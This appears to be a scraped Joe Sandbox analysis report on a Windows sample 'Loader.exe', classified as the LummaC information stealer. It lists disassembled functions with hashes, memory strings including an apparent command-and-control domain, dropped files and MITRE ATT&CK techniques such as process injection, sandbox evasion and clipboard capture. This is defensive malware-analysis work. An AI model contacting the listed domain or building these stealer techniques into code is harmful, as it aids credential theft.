Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 476$@
API String ID: 0-1619901514
Opcode ID: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
Instruction ID: 5274497a0d402a1b10b049c383913524a6e8a02ad7b7e978e53740151cc6be14
Opcode Fuzzy Hash: 2edd24f0470ea495756651cbb646ca1a85ee499d5599157cfa72ce7a226500df
Instruction Fuzzy Hash: C75126B06193008BD314DF19D49076BB7F2FFAA704F04A92EE1C58B361D73A9815DB5A

Function 0041CDED Relevance: 2.2, APIs: 1, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
Instruction ID: fddc4bbdbfca3ff58305c710f32b9e2df51800236505f9ed759e35df3333971b
Opcode Fuzzy Hash: 6ba7beb733572661e7cbb272ad912ba2184529c14f0883f75aa874a1e5e795dc
Instruction Fuzzy Hash: 3232EC75608602DFC704CF28D89066AB3E2FF8A304F49897DE8859B392D779EC51CB49

Function 00423BE0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON

Download Yara Rule

Strings

`;B, xrefs: 00424216

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: `;B
API String ID: 0-334945718
Opcode ID: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
Instruction ID: 90752fbd8667fa49cb39373b4d57b7a022a3754a131126f3b9a8cd52922f7a36
Opcode Fuzzy Hash: 1e63d78b0c997ea6bf236997d86647c47950f5fb558d07b3a3ee316c9d9b5762
Instruction Fuzzy Hash: F202CEB4A00229CBDB18CF54D8A07AFB7B1FF46314F044599E8566F395E3789D41CBA8

Function 0041C400 Relevance: 1.7, APIs: 1, Instructions: 246comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00441538,00000000,00000001,00441528), ref: 0041C429

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
Instruction ID: efcd27da777c76614afb9578cb524e59ae1329c01c42d79ba0897e48e3ba55ec
Opcode Fuzzy Hash: c423282a138e4dd69a8e8fda29ed07e9c2860de9418d6f5ac0c69db86ac4c56f
Instruction Fuzzy Hash: 0051D1B1684314ABD7209B64CCD6BB773A5EF85368F044559F985CB390F378E880C76A

Function 0043E390 Relevance: 1.7, Strings: 1, Instructions: 414COMMON

Download Yara Rule

Strings

%7, xrefs: 0043E786, 0043E726

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %7
API String ID: 0-1474192009
Opcode ID: fa5061bea1924975d2a6e2ad4a31e45d729a66a877d82ee4640a8f01ee5eb968
Instruction ID: fd138ac7190559c5da5ffa1ae91ab7348a5179b75e8251a9d793bd0951800d51
Opcode Fuzzy Hash: fa5061bea1924975d2a6e2ad4a31e45d729a66a877d82ee4640a8f01ee5eb968
Instruction Fuzzy Hash: 81E1AE75E0111ACFCF04CFA9C9902AEB7B2FF8A704F288569C81177385D735A916CBA4

Function 00423F07 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

`;B, xrefs: 00424216

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: `;B
API String ID: 0-334945718
Opcode ID: b3f5026e5e7a75d893355743d3fbb4d30d028e4ef454329ca58d3df04e397ee8
Instruction ID: e79bb1402d12ca4e1089c1955cb7e4222a2cdeab4155382480d8270566b47ced
Opcode Fuzzy Hash: b3f5026e5e7a75d893355743d3fbb4d30d028e4ef454329ca58d3df04e397ee8
Instruction Fuzzy Hash: F691CDB4A0022ACBDB14CF58D8A1BAFB7B1FF46314F044589E855AF795E3789C41CB68

Function 0043A830 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

476, xrefs: 0043A866

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 476
API String ID: 0-2414438958
Opcode ID: d238cba89d2b446ef2cf8b45a61c53fc1e564a3143f5e9f7368e2ea65fca4a10
Instruction ID: bc9afb301ff1bca705e4d9eb558f8990ed30c72b88509f03ea59d0d09f7ecfc7
Opcode Fuzzy Hash: d238cba89d2b446ef2cf8b45a61c53fc1e564a3143f5e9f7368e2ea65fca4a10
Instruction Fuzzy Hash: E351CEB5A482009BD314EF18D884B1BB3E2EB89704F1A992EE5C457351D336AC21CB9B

Function 0043E8D0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

@, xrefs: 0043E995

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 57e96b0382e3e6e538cf0754f49f31a1b9412dbe4e35433da61a86ebac4fb393
Instruction ID: 410551a823e52c8c58878a7ff6f4a4ed23e8846fe5adf79326dadfa67cdcf047
Opcode Fuzzy Hash: 57e96b0382e3e6e538cf0754f49f31a1b9412dbe4e35433da61a86ebac4fb393
Instruction Fuzzy Hash: 1541D4B19093019BD714DF25C851B2BB7E2FFC5318F299A1DE5951B3E0D3399806CB8A

Function 0043F290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

@, xrefs: 0043F2F8

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
Instruction ID: 258c2d8b245171ec294772d4e7ba01eafee234919c336b5a4c57a840b15ac809
Opcode Fuzzy Hash: 8902213a3a23ac088bbc10aa77979db359d26e75aebe188be7e2d487e3c549bf
Instruction Fuzzy Hash: 2131BE715083058BC700DF18D8C066FBBF5FF89314F14992DEA8897361D339A909CB6A

Function 00413846 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

9, xrefs: 004138E8

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
Instruction ID: 5827e64180ae8c9ecbfa916954df96341b4aca638215bbeed84665d770a76ffe
Opcode Fuzzy Hash: eb63667419f5c6b71f3370b197ed23b76021c628920f3877b30b064b49acc9e7
Instruction Fuzzy Hash: E841007461C380AFC344CF24D49475ABBE0AB8A399F84592DE4CAA7262D374D994CB1A

Function 004104D1 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
Instruction ID: bf4e49d12bc1c1665af36ef709e149d706979a2f605b67f4024150dc15a0677b
Opcode Fuzzy Hash: e994381109064e535aa2f66474e739f01fc4647a585f192f3a04191dfc298fe8
Instruction Fuzzy Hash: 6FC157B150C3808BD325EF19C480B9FBBE5AF96305F04092DE5C897392E37A9995CB5B

Function 0043F9E0 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
Instruction ID: f79cfc653f8a236ff0e4eb88f2fa697002daeed1f849f636e8105431ebf0ed9b
Opcode Fuzzy Hash: 13e98caf799d70687418f30074ec28ba22caf06d3b054a4adcd8bbe707dd092a
Instruction Fuzzy Hash: 1A91CF74A083068FC714DF18D890A2BB3E1FF89754F14A92DE8958B361E734EC15CB8A

Function 0041E411 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac9207126e7abe7ab56eb8b70a6de2ce634be6cc43fbce52627eb7aa5cd22c8
Instruction ID: 5b4add5e1241a50acf4a0c27d19a57122d98eb62bacac81d48fa4c35dabefd35
Opcode Fuzzy Hash: 5ac9207126e7abe7ab56eb8b70a6de2ce634be6cc43fbce52627eb7aa5cd22c8
Instruction Fuzzy Hash: 1A6165B49003468FDB24CF96CA80AABBBB1FF45300F54899DD8562B7A5C334A945CF99

Function 0041D940 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e79eff5b2934faaf7f26e72f9fcdb536e9fe95668bd4e1afbd2511dd540a17e
Instruction ID: 83b00c8cc46b3c421b1fb70478cb50fa9a587cc66f5d920c7afb7ad7d0a020ab
Opcode Fuzzy Hash: 0e79eff5b2934faaf7f26e72f9fcdb536e9fe95668bd4e1afbd2511dd540a17e
Instruction Fuzzy Hash: D15187B060C3408BD314DF19C490B2BBBE1EF96798F144A1DE1D59B3A1C7389980CB9B

Function 00403E70 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
Instruction ID: 6f21f8a450a4d2a471238150a230ac53d16a03e3977fccb7e2fd949729755662
Opcode Fuzzy Hash: 8b3d48c41490bc29c29131438a96206e9cd81afa1589dec8b0d555be26f5c051
Instruction Fuzzy Hash: B53197356142019BD7149E19C88092BBBE5EFC431AF148A3EE895A73C1D239ED52CB8A

Function 00431950 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: c944ce86796ee1d2d956b70cdcd2fc0150e1b0d4031ee3526a5232655da8fe44
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 2C110233A051D40EC3128D3C84106B5BFA31EA7274F5D939BE4F89B2E6D6268D8AC359

Function 00424640 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
Instruction ID: b8d9a0782c8c7c5e048b3628c10e4cd8915ff78df5a6c5e6c6960488fa35759b
Opcode Fuzzy Hash: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
Instruction Fuzzy Hash: 1501B1F170032147DB209E12B4C4727B2A8EFD2708F08043EE80857342DB7DEC1486AE

Function 00413A50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
Instruction ID: aa4d63c4c97277b62731f14bec90b410f018f391b3d7958cd39a62f9012a05af
Opcode Fuzzy Hash: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
Instruction Fuzzy Hash: 87F05CB1A0411417DB22CD849CC4F77FBACCF87399F090426E8C1A7202F1755884C3EA

Function 0041DBEA Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443b775d5de63c73ff5dc87661aef6e88c6616c394f33af0bd257110e714242a
Instruction ID: f032b11b1a9ddd9dc13c13fc807dcaf0e8db19b7f117900f85087f7b1a7806fa
Opcode Fuzzy Hash: 443b775d5de63c73ff5dc87661aef6e88c6616c394f33af0bd257110e714242a
Instruction Fuzzy Hash: D1E086BC8093128687009F10C8515BBB2B4AF87345F00285EE88157350F76CC985D36E

Function 004390C0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 9c758fa7a215bf9c728fbebe32270771f8f9286419ee55b993ba3ab27b7309b8
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 12D0A521508721465B7C8D199410577F7F0E9C7711F49955FF585D3244D234DC41C16D

Function 0043A796 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660218fefaa52bd330ec99c342415da08580af5dc128e550123f5800ccb604d1
Instruction ID: 897859d0341ad2f3df62f084b9e9202fef533f110960bf7882fb236f00f8dbeb
Opcode Fuzzy Hash: 660218fefaa52bd330ec99c342415da08580af5dc128e550123f5800ccb604d1
Instruction Fuzzy Hash: F7900224E4C1408781008F009540479E379D38B111F60B5108008334198324E442454C

Function 0040DCF0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 307COMMON

Download Yara Rule

Strings

|nkx, xrefs: 0040DD9A
xq, xrefs: 0040DF99
froytnewqowv.shop, xrefs: 0040E11C
3m, xrefs: 0040DFA4
c|{h, xrefs: 0040DDA5
"#, xrefs: 0040E079
tjch, xrefs: 0040DD8F

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "#$3m$c|{h$froytnewqowv.shop$tjch$xq$|nkx
API String ID: 0-2476188650
Opcode ID: efd6b1e2a11b404d8618c02436c24d13ef05f48848111e042e81429ad5ee1a06
Instruction ID: c23396bfd2754f0d8af95ff7610f3a380faea8e3d3387c487e16893230c2229d
Opcode Fuzzy Hash: efd6b1e2a11b404d8618c02436c24d13ef05f48848111e042e81429ad5ee1a06
Instruction Fuzzy Hash: 21B153B450E3D08BE331CF25C488B9BBBE5BB96304F144A6DE4C96B291C7399905CB97

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_5c39e2f0624fb3ace2547e2d794ca76a89c913_e446d4ea_0d59fd07-587a-4f33-8e7e-2f122e6be1a3\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F48.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3062.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3083.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Loader.exe

Function 02E2249D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Function 01530B20 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 392
memoryCOMMON

Function 01530508 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Function 0043681D Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 405
memoryCOMMON

Function 0040B810 Relevance: 16.4, APIs: 3, Strings: 6, Instructions: 601
libraryCOMMON

Function 0040CC80 Relevance: 14.6, Strings: 11, Instructions: 842
COMMON

Function 0040C000 Relevance: 5.4, Strings: 4, Instructions: 422
COMMON

Function 004365E0 Relevance: 1.6, APIs: 1, Instructions: 88
comCOMMON

Function 0043BC78 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Function 0043C800 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 0040A9A0 Relevance: 4.5, APIs: 3, Instructions: 34
COMMON

Function 0043680F Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 00436728 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Function 0043A7A2 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Function 0043A762 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON